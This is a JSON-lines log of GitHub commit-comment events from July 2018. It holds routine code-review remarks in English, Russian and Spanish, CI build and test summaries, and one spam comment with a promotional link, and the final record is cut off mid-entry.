{"id":"7952857108","type":"CommitCommentEvent","actor":{"login":"sebastian-garofalo"},"repo":{"name":"cgroguez/java-bootcamp"},"payload":{"comment":{"id":29677590,"position":11,"line":11,"path":"src/Builder/ConnDirector.java","commit_id":"e91afb01a13b7054dc35ae307ace779d74c86e7f","created_at":"2018-07-11T22:08:49Z","updated_at":"2018-07-11T22:08:49Z","author_association":"NONE","body":"the idea is to pass the values as parameters, so you can build any kind of object (connection in this case)"}},"created_at":"2018-07-11T22:08:49Z"}
{"id":"7952858752","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29677597,"position":26,"line":26,"path":"test/Splitter.js","commit_id":"835d707af380fd67fbead1b22cf6f2a04f0e624b","created_at":"2018-07-11T22:09:17Z","updated_at":"2018-07-11T22:09:17Z","author_association":"OWNER","body":"Hi Xavier, not sure I follow. Do you mean I should deploy the contract at each `it` ?"}},"created_at":"2018-07-11T22:09:17Z"}
{"id":"7952860739","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29677607,"position":3,"line":12,"path":"Lesson3/route.rb","commit_id":"4e5a60829aa26da8faa3c22595f1b1674980782e","created_at":"2018-07-11T22:09:48Z","updated_at":"2018-07-11T22:09:48Z","author_association":"NONE","body":"Тут нужно подправить индентацию. Мы не внутри блока do end, так-что ``` @stations```  должен быть на одном уровне с ретерном"}},"created_at":"2018-07-11T22:09:48Z"}
{"id":"7952861178","type":"CommitCommentEvent","actor":{"login":"dgrammatiko"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29677609,"position":9,"line":586,"path":"administrator/templates/atum/css/template-rtl.css","commit_id":"984c4582a57fa4efe69c7f858d7144b4993d414b","created_at":"2018-07-11T22:09:55Z","updated_at":"2018-07-11T22:09:55Z","author_association":"MEMBER","body":"Well it doesn't work if you're pointing to an external file (https://caniuse.com/#feat=svg) I'm suggesting to inline the svg at the bottom of the page and hide it. This is ok even for IE"}},"created_at":"2018-07-11T22:09:55Z"}
{"id":"7952861676","type":"CommitCommentEvent","actor":{"login":"Extravert-ir"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29677611,"position":5,"line":9,"path":"boot/freeldr/bootsect/CMakeLists.txt","commit_id":"7913d79df7a3bb0eeb8c663f1199f59833f27c4c","created_at":"2018-07-11T22:10:04Z","updated_at":"2018-07-11T22:10:04Z","author_association":"OWNER","body":"Yes, kernel driver already has \"btrfs\" target. I don't know, maybe we should change the driver name instead"}},"created_at":"2018-07-11T22:10:04Z"}
{"id":"7952868769","type":"CommitCommentEvent","actor":{"login":"bucko13"},"repo":{"name":"bpanel-org/simple-wallet"},"payload":{"comment":{"id":29677635,"position":null,"line":null,"path":null,"commit_id":"ec5b2aee145dcb5785a0055843fa826bd6a784e8","created_at":"2018-07-11T22:12:00Z","updated_at":"2018-07-11T22:12:00Z","author_association":"CONTRIBUTOR","body":"Great change! I like this a lot. I bet we could generalize this even more too. Since this whole thing is basically a list of switches to match a text and then a corresponding function that returns a [val, bool] tuple, we could create a generalized validator that takes in a list or dictionary of these parings to create the full validator. "}},"created_at":"2018-07-11T22:12:00Z"}
{"id":"7952870174","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29677645,"position":6,"line":11,"path":"Lesson3/station.rb","commit_id":"4e5a60829aa26da8faa3c22595f1b1674980782e","created_at":"2018-07-11T22:12:21Z","updated_at":"2018-07-11T22:12:21Z","author_association":"NONE","body":"индентация"}},"created_at":"2018-07-11T22:12:21Z"}
{"id":"7952871920","type":"CommitCommentEvent","actor":{"login":"anndresfelipe29"},"repo":{"name":"anndresfelipe29/Gestion-Vehicular"},"payload":{"comment":{"id":29677657,"position":null,"line":null,"path":null,"commit_id":"8c8ea7c023c7921911d5c4b9e52eb381cde630f7","created_at":"2018-07-11T22:12:49Z","updated_at":"2018-07-11T22:12:49Z","author_association":"OWNER","body":"Carpeta con el codigo correspondiente al proyecto"}},"created_at":"2018-07-11T22:12:49Z"}
{"id":"7952874495","type":"CommitCommentEvent","actor":{"login":"dayaaaaa"},"repo":{"name":"dayaaaaa/Hackr-Rank-Introduction-solutions"},"payload":{"comment":{"id":29677666,"position":null,"line":null,"path":null,"commit_id":"9a8ef0c99b77387eff7c55ac1b1b2a48f732e079","created_at":"2018-07-11T22:13:28Z","updated_at":"2018-07-11T22:13:28Z","author_association":"OWNER","body":"Main reason why we using Scan.nextLine();before the String variable.\r\nAfter supplying data for int, we would hit the enter key. What nextInt() and nextDouble() does is it assigns integer to appropriate variable and keeps the enter key unread in thekeyboard buffer. so when its time to supply String the nextLine() will read the enter key from the user thinking that the user has entered the enter key.(that's we get empty output) . Unlike C, there is no fflush() to clean buffer, so we have to flush by not taking it in variable."}},"created_at":"2018-07-11T22:13:28Z"}
{"id":"7952876305","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29677672,"position":17,"line":22,"path":"Lesson3/station.rb","commit_id":"4e5a60829aa26da8faa3c22595f1b1674980782e","created_at":"2018-07-11T22:13:57Z","updated_at":"2018-07-11T22:13:57Z","author_association":"NONE","body":"Что этот метод должен делать? trains это массив. У массива есть метод type?"}},"created_at":"2018-07-11T22:13:57Z"}
{"id":"7952880422","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29677677,"position":null,"line":null,"path":null,"commit_id":"5b33f715583a2465d23a246b0d297b75228d990f","created_at":"2018-07-11T22:14:56Z","updated_at":"2018-07-11T22:14:56Z","author_association":"NONE","body":"expanded-runperiod (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2916 of 2926 tests passed, 13 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 14 tests had: EIO diffs.\n * 10 tests had: ESO big diffs.\n * 8 tests had: Table big diffs.\n * 4 tests had: ESO small diffs.\n * 4 tests had: Table small diffs.\n * 2 tests had: ERR diffs.\n * 5 tests had: MTR big diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 613\n * Failed: 10\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b33f715583a2465d23a246b0d297b75228d990f-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b33f715583a2465d23a246b0d297b75228d990f-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T22:14:56Z"}
{"id":"7952882253","type":"CommitCommentEvent","actor":{"login":"brianteeman"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29677686,"position":9,"line":586,"path":"administrator/templates/atum/css/template-rtl.css","commit_id":"984c4582a57fa4efe69c7f858d7144b4993d414b","created_at":"2018-07-11T22:15:23Z","updated_at":"2018-07-11T22:15:23Z","author_association":"CONTRIBUTOR","body":"i am commenting that the current code doesnt work in ie11 (and in a weird way) \r\n<img width=\"229\" alt=\"iexplore_2018-07-11_23-13-39\" src=\"https://user-images.githubusercontent.com/1296369/42602127-13bd1202-8560-11e8-9fc7-bef580aedc04.png\">\r\n"}},"created_at":"2018-07-11T22:15:23Z"}
{"id":"7952885936","type":"CommitCommentEvent","actor":{"login":"leafpetersen"},"repo":{"name":"dart-lang/http"},"payload":{"comment":{"id":29677703,"position":5,"line":19,"path":"test/io/client_test.dart","commit_id":"5f0d5579d27501aa23e04a0f02d7f6d27b1098d0","created_at":"2018-07-11T22:16:19Z","updated_at":"2018-07-11T22:16:19Z","author_association":"MEMBER","body":"This is the wrong name.  Should be HttpHeaders.contentTypeHeader"}},"created_at":"2018-07-11T22:16:19Z"}
{"id":"7952887296","type":"CommitCommentEvent","actor":{"login":"leafpetersen"},"repo":{"name":"dart-lang/http"},"payload":{"comment":{"id":29677707,"position":8,"line":21,"path":"test/io/client_test.dart","commit_id":"5f0d5579d27501aa23e04a0f02d7f6d27b1098d0","created_at":"2018-07-11T22:16:42Z","updated_at":"2018-07-11T22:16:42Z","author_association":"MEMBER","body":"Here also."}},"created_at":"2018-07-11T22:16:42Z"}
{"id":"7952888505","type":"CommitCommentEvent","actor":{"login":"leafpetersen"},"repo":{"name":"dart-lang/http"},"payload":{"comment":{"id":29677711,"position":17,"line":54,"path":"test/io/client_test.dart","commit_id":"5f0d5579d27501aa23e04a0f02d7f6d27b1098d0","created_at":"2018-07-11T22:17:03Z","updated_at":"2018-07-11T22:17:03Z","author_association":"MEMBER","body":"Here, and everything else with HttpHeaders below."}},"created_at":"2018-07-11T22:17:03Z"}
{"id":"7952890864","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"scottschurr/rippled"},"payload":{"comment":{"id":29677717,"position":null,"line":null,"path":null,"commit_id":"748e0848bbe04d9c8aa81982f6d1052bd6bc0ab3","created_at":"2018-07-11T22:17:40Z","updated_at":"2018-07-11T22:17:40Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/scottschurr/rippled/commit/748e0848bbe04d9c8aa81982f6d1052bd6bc0ab3)\n\nBuilt at __20180711 - 22:17:40__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 564s | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/coverage.txt) | 1035 cases, 0 failed, t: 681s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 799s | PASS :white_check_mark: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 250s | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 492s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 249s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 617s | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1237s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 341s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 622s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 354s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 519s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/5//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 245s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-11T22:17:40Z"}
{"id":"7952893946","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29677723,"position":null,"line":null,"path":null,"commit_id":"b4bbfb30d49f12dbf8d58a071532cf03c64e374c","created_at":"2018-07-11T22:18:32Z","updated_at":"2018-07-11T22:18:32Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-687](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-687).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-687-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T22:18:32Z"}
{"id":"7952894142","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29677724,"position":29,"line":30,"path":"Lesson3/station.rb","commit_id":"4e5a60829aa26da8faa3c22595f1b1674980782e","created_at":"2018-07-11T22:18:35Z","updated_at":"2018-07-11T22:18:35Z","author_association":"NONE","body":"Предлагал тебе посмотреть в сторону метода select, и count.\r\n```\r\n# если ты хочешь выбрать (и например вывести)\r\ntrains.select { |train| train.type == type }\r\n# если ты хочешь просто посчитать\r\ntrains.count { |train| train.type == type }"}},"created_at":"2018-07-11T22:18:35Z"}
{"id":"7952895721","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29677726,"position":111,"line":123,"path":"mono/metadata/marshal-windows.c","commit_id":"9b3ed86e62d3f81db956df4160128aeb556a199e","created_at":"2018-07-11T22:19:01Z","updated_at":"2018-07-11T22:19:01Z","author_association":"MEMBER","body":"Try to have just one of these."}},"created_at":"2018-07-11T22:19:01Z"}
{"id":"7952896022","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29677727,"position":15,"line":21,"path":"contracts/Pausable.sol","commit_id":"b0c2efdd7605c0dbc254e2632241316c791a47f5","created_at":"2018-07-11T22:19:07Z","updated_at":"2018-07-11T22:19:07Z","author_association":"OWNER","body":"I thought events could be repeated. Are they supposed to be unique?"}},"created_at":"2018-07-11T22:19:07Z"}
{"id":"7952898103","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29677731,"position":99,"line":110,"path":"mono/metadata/marshal-windows.c","commit_id":"9b3ed86e62d3f81db956df4160128aeb556a199e","created_at":"2018-07-11T22:19:41Z","updated_at":"2018-07-11T22:19:41Z","author_association":"MEMBER","body":"This looks wrong."}},"created_at":"2018-07-11T22:19:41Z"}
{"id":"7952900628","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29677735,"position":5,"line":61,"path":"test/Common.FunctionalTests/Utilities/Helpers.cs","commit_id":"8dc01f6abaf99ba2b05010a3600251b816e33bb6","created_at":"2018-07-11T22:20:23Z","updated_at":"2018-07-11T22:20:23Z","author_association":"CONTRIBUTOR","body":"What if it's not debug related setting (i.e. OOP handler version)?"}},"created_at":"2018-07-11T22:20:23Z"}
{"id":"7952901022","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29677736,"position":29,"line":30,"path":"Lesson3/station.rb","commit_id":"4e5a60829aa26da8faa3c22595f1b1674980782e","created_at":"2018-07-11T22:20:30Z","updated_at":"2018-07-11T22:20:30Z","author_association":"NONE","body":"Нет смысла создавать локальные переменные passenger_trains и cargo_trains_count, если они потом не используются. "}},"created_at":"2018-07-11T22:20:30Z"}
{"id":"7952902079","type":"CommitCommentEvent","actor":{"login":"slimlime"},"repo":{"name":"yarnpkg/assets"},"payload":{"comment":{"id":29677738,"position":null,"line":null,"path":null,"commit_id":"b28fd5a09430a7b7701dbebe1765fe166c389cc6","created_at":"2018-07-11T22:20:47Z","updated_at":"2018-07-11T22:20:47Z","author_association":"NONE","body":"🐱 😹 "}},"created_at":"2018-07-11T22:20:47Z"}
{"id":"7952903368","type":"CommitCommentEvent","actor":{"login":"jkotalik"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29677740,"position":5,"line":61,"path":"test/Common.FunctionalTests/Utilities/Helpers.cs","commit_id":"8dc01f6abaf99ba2b05010a3600251b816e33bb6","created_at":"2018-07-11T22:21:10Z","updated_at":"2018-07-11T22:21:10Z","author_association":"CONTRIBUTOR","body":"Yeah I got lazy. I'll make the check better."}},"created_at":"2018-07-11T22:21:10Z"}
{"id":"7952904784","type":"CommitCommentEvent","actor":{"login":"axelvalenzuela"},"repo":{"name":"Mabyta/django-Polls-Mejorado"},"payload":{"comment":{"id":29677744,"position":19,"line":19,"path":"polls_mejorado/urls.py","commit_id":"b1d434b053fac4723b3ac6f8672d5650f726bad8","created_at":"2018-07-11T22:21:30Z","updated_at":"2018-07-11T22:21:30Z","author_association":"COLLABORATOR","body":"**gg**"}},"created_at":"2018-07-11T22:21:30Z"}
{"id":"7952908879","type":"CommitCommentEvent","actor":{"login":"justsml"},"repo":{"name":"sean-blattenberger/trip-journal"},"payload":{"comment":{"id":29677756,"position":103,"line":103,"path":"src/components/SingleTrip.js","commit_id":"932fc89efa41ec87f24ab8a2adcdf5c0e7969432","created_at":"2018-07-11T22:22:41Z","updated_at":"2018-07-11T22:22:41Z","author_association":"NONE","body":"Could refactor to use React's native JS/string/JSX magic:  \r\n```jsx\r\n<div className=\"white-text\">\r\n  {this.state.trip.city}, {this.state.trip.state}\r\n</div>\r\n```"}},"created_at":"2018-07-11T22:22:41Z"}
{"id":"7952909779","type":"CommitCommentEvent","actor":{"login":"Timothyb92"},"repo":{"name":"Timothyb92/Basic-Portfolio"},"payload":{"comment":{"id":29677759,"position":null,"line":null,"path":null,"commit_id":"2ee31ce4cf81d095dab03892a6a6f0c8d59941fd","created_at":"2018-07-11T22:22:57Z","updated_at":"2018-07-11T22:22:57Z","author_association":"OWNER","body":"Actually was id tags, not class tags. Whoops."}},"created_at":"2018-07-11T22:22:57Z"}
{"id":"7952910320","type":"CommitCommentEvent","actor":{"login":"kennethbhunt"},"repo":{"name":"kennethbhunt/kennethbhunt.github.io"},"payload":{"comment":{"id":29677760,"position":null,"line":null,"path":null,"commit_id":"0fe60c24fbec029bb1c5b80260d9e686dea16c39","created_at":"2018-07-11T22:23:06Z","updated_at":"2018-07-11T22:23:06Z","author_association":"OWNER","body":"datasciencepro.solutions"}},"created_at":"2018-07-11T22:23:06Z"}
{"id":"7952913979","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29677765,"position":24,"line":25,"path":"Lesson3/route.rb","commit_id":"0b85487eda347ed21c6b197bb8e98a3d891c54f5","created_at":"2018-07-11T22:24:07Z","updated_at":"2018-07-11T22:24:07Z","author_association":"NONE","body":"Опять-же можно сделать ранний ретерн если\r\n```\r\nreturn unless [first_station, last_station].incliude?(station)\r\n```"}},"created_at":"2018-07-11T22:24:07Z"}
{"id":"7952938177","type":"CommitCommentEvent","actor":{"login":"mherbert"},"repo":{"name":"GoogleCloudPlatform/gsutil"},"payload":{"comment":{"id":29677824,"position":64,"line":369,"path":"gslib/__main__.py","commit_id":"b1ece8cf0da1e9e4d05f12a58ff40f8f98548a7d","created_at":"2018-07-11T22:31:02Z","updated_at":"2018-07-11T22:31:02Z","author_association":"NONE","body":"Fair enough considering gsutil doesn't support a different https_proxy anyway (= the limitation the warning should be clearer about in any case).\r\n\r\nAfraid the ChromeOS build (and others) invoke gsutil in a large number of places though."}},"created_at":"2018-07-11T22:31:02Z"}
{"id":"7952944332","type":"CommitCommentEvent","actor":{"login":"geek1011"},"repo":{"name":"jcn363/kobopatch-patches"},"payload":{"comment":{"id":29677841,"position":null,"line":null,"path":null,"commit_id":"3c4d881dca4ce66c2e874e5f67d74502c44d9495","created_at":"2018-07-11T22:32:52Z","updated_at":"2018-07-11T22:32:52Z","author_association":"NONE","body":"You'll need to update the testdata, turn sickel.yaml into a folder with jcn363.yaml inside it (like the other patches), and update kobopatch.yaml in the template."}},"created_at":"2018-07-11T22:32:52Z"}
{"id":"7952945149","type":"CommitCommentEvent","actor":{"login":"hiliang-cmu"},"repo":{"name":"picoCTF/picoCTF"},"payload":{"comment":{"id":29677842,"position":null,"line":null,"path":null,"commit_id":"415533e56094d1a3f3985feab78997943d62587d","created_at":"2018-07-11T22:33:06Z","updated_at":"2018-07-11T22:33:06Z","author_association":"CONTRIBUTOR","body":"Fixed in #107"}},"created_at":"2018-07-11T22:33:06Z"}
{"id":"7952948142","type":"CommitCommentEvent","actor":{"login":"DevinCarr"},"repo":{"name":"MaelstromDrift/Sidescroller"},"payload":{"comment":{"id":29677856,"position":null,"line":null,"path":null,"commit_id":"420367f709de4f579a8f2ea7a35892ed4e5640b8","created_at":"2018-07-11T22:34:00Z","updated_at":"2018-07-11T22:34:00Z","author_association":"COLLABORATOR","body":"tsk tsk"}},"created_at":"2018-07-11T22:34:00Z"}
{"id":"7952948920","type":"CommitCommentEvent","actor":{"login":"angoenka"},"repo":{"name":"apache/beam"},"payload":{"comment":{"id":29677860,"position":null,"line":null,"path":null,"commit_id":"316a9962eecfc55cf5537ee547a16c2bc75ee333","created_at":"2018-07-11T22:34:14Z","updated_at":"2018-07-11T22:34:14Z","author_association":"CONTRIBUTOR","body":"Yes, it seems the case.\r\nMy understanding was that if the image is in the local docker repo then its not pulled. apparently thats not the case.\r\nI will explore a potential fix here."}},"created_at":"2018-07-11T22:34:14Z"}
{"id":"7952950076","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29677865,"position":null,"line":null,"path":null,"commit_id":"82cbedd8dfba81ea89b8c6b23c4dffebeb288045","created_at":"2018-07-11T22:34:34Z","updated_at":"2018-07-11T22:34:34Z","author_association":"NONE","body":"Не нашел в каком комите у тебя меняется имплементация этих методов, так-что напишу тут\r\n```\r\n  def move_forward\r\n    if next_station != nil \r\n      @index_station += 1\r\n      previous_station.train_send(self)\r\n      current_station.train_get(self)\r\n    end\r\n  end\r\n\r\n  def move_back\r\n   if previous_station != nil\r\n     @index_station -= 1 \r\n     next_station.train_send(self)\r\n     current_station.train_get(self)\r\n   end\r\n end\r\n```\r\nЛогичней будет, если будет следующая последовательность действий\r\n1. Текущая станция отправляет поезд\r\n2. Следующая/Предыдущая станция принимает поезд\r\n3. Следующая/Предыдущая станция становится текущей"}},"created_at":"2018-07-11T22:34:34Z"}
{"id":"7952950583","type":"CommitCommentEvent","actor":{"login":"akrzemi1"},"repo":{"name":"boostorg/optional"},"payload":{"comment":{"id":29677868,"position":null,"line":null,"path":null,"commit_id":"71d797b9ee132b381c2d4f3b5bcca2078b0a5062","created_at":"2018-07-11T22:34:43Z","updated_at":"2018-07-11T22:34:43Z","author_association":"MEMBER","body":"I opened an issue for this: https://github.com/boostorg/optional/issues/57"}},"created_at":"2018-07-11T22:34:43Z"}
{"id":"7952950898","type":"CommitCommentEvent","actor":{"login":"KellyRosales"},"repo":{"name":"KellyRosales/lim-2018-05-bc-core-am-datadashboard"},"payload":{"comment":{"id":29677869,"position":null,"line":null,"path":null,"commit_id":"32068626bd500b3a91d771354ee719ca57ef0ae7","created_at":"2018-07-11T22:34:49Z","updated_at":"2018-07-11T22:34:49Z","author_association":"OWNER","body":"Error de fusión de ramas"}},"created_at":"2018-07-11T22:34:49Z"}
{"id":"7952954787","type":"CommitCommentEvent","actor":{"login":"FifthRooter"},"repo":{"name":"FifthRooter/to-the-moon"},"payload":{"comment":{"id":29677879,"position":3,"line":3,"path":"to-the-moon/Earth.h","commit_id":"5ae87a8b593273095853793342287c1002cc0928","created_at":"2018-07-11T22:36:00Z","updated_at":"2018-07-11T22:36:00Z","author_association":"OWNER","body":"lol"}},"created_at":"2018-07-11T22:36:00Z"}
{"id":"7952959163","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29677887,"position":null,"line":null,"path":null,"commit_id":"f2f7c4287ff257e7c219737b0d7416a7965c0c3e","created_at":"2018-07-11T22:37:20Z","updated_at":"2018-07-11T22:37:20Z","author_association":"CONTRIBUTOR","body":"This commit breaks the `tqdm` tests, at least on Darwin."}},"created_at":"2018-07-11T22:37:20Z"}
{"id":"7952960717","type":"CommitCommentEvent","actor":{"login":"hazwan90"},"repo":{"name":"GoogleCloudPlatform/google-cloud-java"},"payload":{"comment":{"id":29677892,"position":null,"line":null,"path":null,"commit_id":"b5d5cf00cd54ba7714a2363875750e3f5222d42d","created_at":"2018-07-11T22:37:45Z","updated_at":"2018-07-11T22:37:45Z","author_association":"NONE","body":"b5d5cf0"}},"created_at":"2018-07-11T22:37:45Z"}
{"id":"7952961009","type":"CommitCommentEvent","actor":{"login":"angoenka"},"repo":{"name":"apache/beam"},"payload":{"comment":{"id":29677893,"position":null,"line":null,"path":null,"commit_id":"316a9962eecfc55cf5537ee547a16c2bc75ee333","created_at":"2018-07-11T22:37:49Z","updated_at":"2018-07-11T22:37:49Z","author_association":"CONTRIBUTOR","body":"For now I will just wrap this pull exception in a try catch and log it as a warning."}},"created_at":"2018-07-11T22:37:49Z"}
{"id":"7952961851","type":"CommitCommentEvent","actor":{"login":"Knorrke"},"repo":{"name":"serlo-org/athene2"},"payload":{"comment":{"id":29677896,"position":10,"line":null,"path":"src/module/Ui/templates/entity/view/video.twig","commit_id":"c1a566ef1e33eb45aae9d30293e3c0fe4b89e4a9","created_at":"2018-07-11T22:38:03Z","updated_at":"2018-07-11T22:38:03Z","author_association":"COLLABORATOR","body":"This line is hard to understand, but i think the three split parts are the following cases:\n* youtube.com/watch?v=video-id\n* youtu.be/video-id\n* the above with additional params\n\nIs that correct?"}},"created_at":"2018-07-11T22:38:03Z"}
{"id":"7952966406","type":"CommitCommentEvent","actor":{"login":"tadeubarbosa"},"repo":{"name":"valdiney/Ofir_Framework-0.1"},"payload":{"comment":{"id":29677908,"position":null,"line":null,"path":null,"commit_id":"9c738f8f1971fe189b9bc5355b95d3a8166f1d49","created_at":"2018-07-11T22:39:26Z","updated_at":"2018-07-11T22:39:26Z","author_association":"COLLABORATOR","body":"Boa! :+1: "}},"created_at":"2018-07-11T22:39:26Z"}
{"id":"7952967647","type":"CommitCommentEvent","actor":{"login":"yeararahman"},"repo":{"name":"leotse90/blogs"},"payload":{"comment":{"id":29677916,"position":null,"line":null,"path":null,"commit_id":"8056d869886d8391afcea3f0c7f303ca5552beef","created_at":"2018-07-11T22:39:47Z","updated_at":"2018-07-11T22:39:47Z","author_association":"NONE","body":"I am actually getting ready to across this information, is very helpful my friend. Also great blog here with all of the valuable information you have. Keep up the good work you are doing here.\r\n\r\n<a href='https://www.clippingpathquick.com/' title='Clipping Path Service'>clipping path service</a>"}},"created_at":"2018-07-11T22:39:47Z"}
{"id":"7952970336","type":"CommitCommentEvent","actor":{"login":"brayspra"},"repo":{"name":"brayspra/hoja-de-vida-website"},"payload":{"comment":{"id":29677925,"position":null,"line":null,"path":null,"commit_id":"420c631c0869a506ca9417222d8a7928d23e549f","created_at":"2018-07-11T22:40:37Z","updated_at":"2018-07-11T22:40:37Z","author_association":"OWNER","body":"hola.papus"}},"created_at":"2018-07-11T22:40:37Z"}
{"id":"7952973237","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29677931,"position":null,"line":null,"path":null,"commit_id":"9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff","created_at":"2018-07-11T22:41:28Z","updated_at":"2018-07-11T22:41:28Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - x86_64-MacOS-10.9-clang: OK (2931 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff-x86_64-MacOS-10.9-clang.html'>![Test 